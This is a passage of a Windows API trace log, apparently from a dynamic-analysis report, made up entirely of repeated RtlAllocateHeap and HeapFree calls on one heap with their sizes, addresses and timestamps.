Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: 